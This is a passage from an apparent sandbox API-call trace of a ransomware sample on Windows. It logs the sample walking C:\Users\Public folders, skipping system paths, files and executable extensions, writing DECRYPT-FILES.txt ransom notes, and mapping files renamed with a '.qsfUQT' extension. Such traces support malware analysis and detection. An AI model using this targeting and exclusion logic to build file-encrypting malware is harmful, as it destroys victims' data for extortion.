ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf2043a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.750] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.750] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.750] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2043a80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf2043a80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf2043a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0186.750] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0186.750] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0186.750] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0186.750] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0186.750] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0186.750] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0186.750] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0186.750] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0186.750] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0186.750] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0186.750] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.750] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0186.750] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0186.750] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0186.750] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0186.750] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\") returned 26 [0186.750] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.750] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\Public\\Libraries\\" | out: lpString1="C:\\Users\\Public\\Libraries\\") returned="C:\\Users\\Public\\Libraries\\" [0186.750] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\Public\\Libraries\\0a16c9.tmp") returned="C:\\Users\\Public\\Libraries\\0a16c9.tmp" [0186.751] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.751] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\0a16c9.tmp" (normalized: "c:\\users\\public\\libraries\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.751] CloseHandle (hObject=0x0) returned 0 [0186.751] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.751] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0f9c6e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0f9c6e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f9c6e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.751] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.751] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2839e1d0, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2839e1d0, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288f9359, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x58, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.751] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.751] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.751] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.751] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.751] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2837806f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x289b7a3b, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0xb0fc2840, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x474, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecordedTV.library-ms.qsfUQT", cAlternateFileName="RECORD~1.QSF")) returned 1 [0186.751] lstrcmpiW (lpString1="RecordedTV.library-ms.qsfUQT", lpString2="DECRYPT-FILES.txt") returned 1 [0186.751] lstrcmpiW (lpString1="RecordedTV.library-ms.qsfUQT", lpString2="autorun.inf") returned 1 [0186.751] lstrcmpiW (lpString1="RecordedTV.library-ms.qsfUQT", lpString2="boot.ini") returned 1 [0186.751] lstrcmpiW (lpString1="RecordedTV.library-ms.qsfUQT", lpString2="desktop.ini") returned 1 [0186.751] lstrcmpiW (lpString1="RecordedTV.library-ms.qsfUQT", lpString2="ntuser.dat") returned 1 [0186.751] lstrcmpiW (lpString1="RecordedTV.library-ms.qsfUQT", lpString2="iconcache.db") returned 1 [0186.751] lstrcmpiW (lpString1="RecordedTV.library-ms.qsfUQT", lpString2="bootsect.bak") returned 1 [0186.751] lstrcmpiW (lpString1="RecordedTV.library-ms.qsfUQT", lpString2="ntuser.dat.log") returned 1 [0186.752] lstrcmpiW (lpString1="RecordedTV.library-ms.qsfUQT", lpString2="thumbs.db") returned -1 [0186.752] lstrcmpiW (lpString1="RecordedTV.library-ms.qsfUQT", lpString2="Bootfont.bin") returned 1 [0186.752] lstrlenW (lpString="RecordedTV.library-ms.qsfUQT") returned 28 [0186.752] lstrcmpiW (lpString1="qsfUQT", lpString2="lnk") returned 1 [0186.752] lstrcmpiW (lpString1="qsfUQT", lpString2="exe") returned 1 [0186.752] lstrcmpiW (lpString1="qsfUQT", lpString2="sys") returned -1 [0186.752] lstrcmpiW (lpString1="qsfUQT", lpString2="dll") returned 1 [0186.752] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\") returned 26 [0186.752] lstrlenW (lpString="RecordedTV.library-ms.qsfUQT") returned 28 [0186.752] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\Public\\Libraries\\" | out: lpString1="C:\\Users\\Public\\Libraries\\") returned="C:\\Users\\Public\\Libraries\\" [0186.752] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries\\", lpString2="RecordedTV.library-ms.qsfUQT" | out: lpString1="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.qsfUQT") returned="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.qsfUQT" [0186.752] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.752] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.qsfUQT" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.qsfuqt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0186.752] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=1140) returned 1 [0186.752] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0186.752] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.753] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.753] CloseHandle (hObject=0x260) returned 1 [0186.753] CloseHandle (hObject=0x25c) returned 1 [0186.753] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.753] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2837806f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x289b7a3b, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0xb0fc2840, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x474, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecordedTV.library-ms.qsfUQT", cAlternateFileName="RECORD~1.QSF")) returned 0 [0186.753] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0186.753] CloseHandle (hObject=0x254) returned 1 [0186.754] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0fc2840, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0fc2840, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0186.754] lstrcmpW (lpString1="Music", lpString2=".") returned 1 [0186.754] lstrcmpW (lpString1="Music", lpString2="..") returned 1 [0186.754] lstrcatW (in: lpString1="Music", lpString2="\\" | out: lpString1="Music\\") returned="Music\\" [0186.754] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Music\\" | out: lpString1="C:\\Users\\Public\\Music\\") returned="C:\\Users\\Public\\Music\\" [0186.754] StrStrW (lpFirst="C:\\Users\\Public\\Music\\", lpSrch="\\Program Files") returned 0x0 [0186.754] StrStrW (lpFirst="C:\\Users\\Public\\Music\\", lpSrch=":\\Windows") returned 0x0 [0186.754] StrStrW (lpFirst="C:\\Users\\Public\\Music\\", lpSrch="\\Games\\") returned 0x0 [0186.754] StrStrW (lpFirst="C:\\Users\\Public\\Music\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.754] StrStrW (lpFirst="C:\\Users\\Public\\Music\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.754] StrStrW (lpFirst="C:\\Users\\Public\\Music\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.754] StrStrW (lpFirst="C:\\Users\\Public\\Music\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.754] StrStrW (lpFirst="C:\\Users\\Public\\Music\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.754] StrStrW (lpFirst="C:\\Users\\Public\\Music\\", lpSrch="\\All Users") returned 0x0 [0186.754] StrStrW (lpFirst="C:\\Users\\Public\\Music\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.754] StrStrW (lpFirst="C:\\Users\\Public\\Music\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.754] StrStrW (lpFirst="C:\\Users\\Public\\Music\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.754] StrStrW (lpFirst="C:\\Users\\Public\\Music\\", lpSrch="AhnLab") returned 0x0 [0186.754] StrStrW (lpFirst="C:\\Users\\Public\\Music\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.754] lstrlenW (lpString="C:\\Users\\Public\\Music\\") returned 22 [0186.754] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.754] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Music\\\\0a16c9.tmp") returned 33 [0186.754] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\\\0a16c9.tmp" (normalized: "c:\\users\\public\\music\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x254 [0186.754] lstrlenW (lpString="C:\\Users\\Public\\Music\\") returned 22 [0186.754] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.754] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Music\\\\DECRYPT-FILES.txt") returned 40 [0186.755] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\music\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.755] lstrlenW (lpString="C:\\Users\\Public\\Music\\") returned 22 [0186.755] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Music\\*") returned="C:\\Users\\Public\\Music\\*" [0186.755] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf2043a80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf2043a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0186.755] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.755] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf2043a80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf2043a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.755] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.755] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.755] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf201d920, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf2043a80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf2043a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0186.755] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0186.755] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0186.755] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0186.755] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0186.755] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0186.755] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0186.755] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0186.755] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0186.755] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0186.755] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0186.755] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.755] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0186.755] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0186.755] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0186.755] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0186.755] lstrlenW (lpString="C:\\Users\\Public\\Music\\") returned 22 [0186.755] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.755] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\Public\\Music\\" | out: lpString1="C:\\Users\\Public\\Music\\") returned="C:\\Users\\Public\\Music\\" [0186.755] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\Public\\Music\\0a16c9.tmp") returned="C:\\Users\\Public\\Music\\0a16c9.tmp" [0186.755] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.756] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\0a16c9.tmp" (normalized: "c:\\users\\public\\music\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.756] CloseHandle (hObject=0x0) returned 0 [0186.756] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.756] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0f76580, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0f76580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f76580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.756] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.756] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28305c4e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.756] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.756] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.756] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.756] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.756] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xb14ab5a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb14ab5a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 1 [0186.756] lstrcmpW (lpString1="Sample Music", lpString2=".") returned 1 [0186.756] lstrcmpW (lpString1="Sample Music", lpString2="..") returned 1 [0186.756] lstrcatW (in: lpString1="Sample Music", lpString2="\\" | out: lpString1="Sample Music\\") returned="Sample Music\\" [0186.756] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\", lpString2="Sample Music\\" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music\\") returned="C:\\Users\\Public\\Music\\Sample Music\\" [0186.756] StrStrW (lpFirst="C:\\Users\\Public\\Music\\Sample Music\\", lpSrch="\\Program Files") returned 0x0 [0186.756] StrStrW (lpFirst="C:\\Users\\Public\\Music\\Sample Music\\", lpSrch=":\\Windows") returned 0x0 [0186.756] StrStrW (lpFirst="C:\\Users\\Public\\Music\\Sample Music\\", lpSrch="\\Games\\") returned 0x0 [0186.756] StrStrW (lpFirst="C:\\Users\\Public\\Music\\Sample Music\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.756] StrStrW (lpFirst="C:\\Users\\Public\\Music\\Sample Music\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.756] StrStrW (lpFirst="C:\\Users\\Public\\Music\\Sample Music\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.757] StrStrW (lpFirst="C:\\Users\\Public\\Music\\Sample Music\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.757] StrStrW (lpFirst="C:\\Users\\Public\\Music\\Sample Music\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.757] StrStrW (lpFirst="C:\\Users\\Public\\Music\\Sample Music\\", lpSrch="\\All Users") returned 0x0 [0186.757] StrStrW (lpFirst="C:\\Users\\Public\\Music\\Sample Music\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.757] StrStrW (lpFirst="C:\\Users\\Public\\Music\\Sample Music\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.757] StrStrW (lpFirst="C:\\Users\\Public\\Music\\Sample Music\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.757] StrStrW (lpFirst="C:\\Users\\Public\\Music\\Sample Music\\", lpSrch="AhnLab") returned 0x0 [0186.757] StrStrW (lpFirst="C:\\Users\\Public\\Music\\Sample Music\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.757] lstrlenW (lpString="C:\\Users\\Public\\Music\\Sample Music\\") returned 35 [0186.757] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.757] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Music\\Sample Music\\\\0a16c9.tmp") returned 46 [0186.757] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\\\0a16c9.tmp" (normalized: "c:\\users\\public\\music\\sample music\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x25c [0186.759] lstrlenW (lpString="C:\\Users\\Public\\Music\\Sample Music\\") returned 35 [0186.759] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.759] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Music\\Sample Music\\\\DECRYPT-FILES.txt") returned 53 [0186.759] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\music\\sample music\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.759] lstrlenW (lpString="C:\\Users\\Public\\Music\\Sample Music\\") returned 35 [0186.759] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\Sample Music\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music\\*") returned="C:\\Users\\Public\\Music\\Sample Music\\*" [0186.759] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xf2069be0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf2069be0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798b8 [0186.759] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.759] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xf2069be0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf2069be0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.759] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.759] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.759] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2069be0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf2069be0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf2069be0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0186.759] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0186.759] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0186.759] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0186.759] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0186.759] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0186.759] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0186.759] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0186.759] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0186.759] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0186.759] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0186.759] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.759] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0186.759] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0186.760] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0186.760] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0186.760] lstrlenW (lpString="C:\\Users\\Public\\Music\\Sample Music\\") returned 35 [0186.760] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.760] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Public\\Music\\Sample Music\\" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music\\") returned="C:\\Users\\Public\\Music\\Sample Music\\" [0186.760] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\Sample Music\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music\\0a16c9.tmp") returned="C:\\Users\\Public\\Music\\Sample Music\\0a16c9.tmp" [0186.760] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.760] 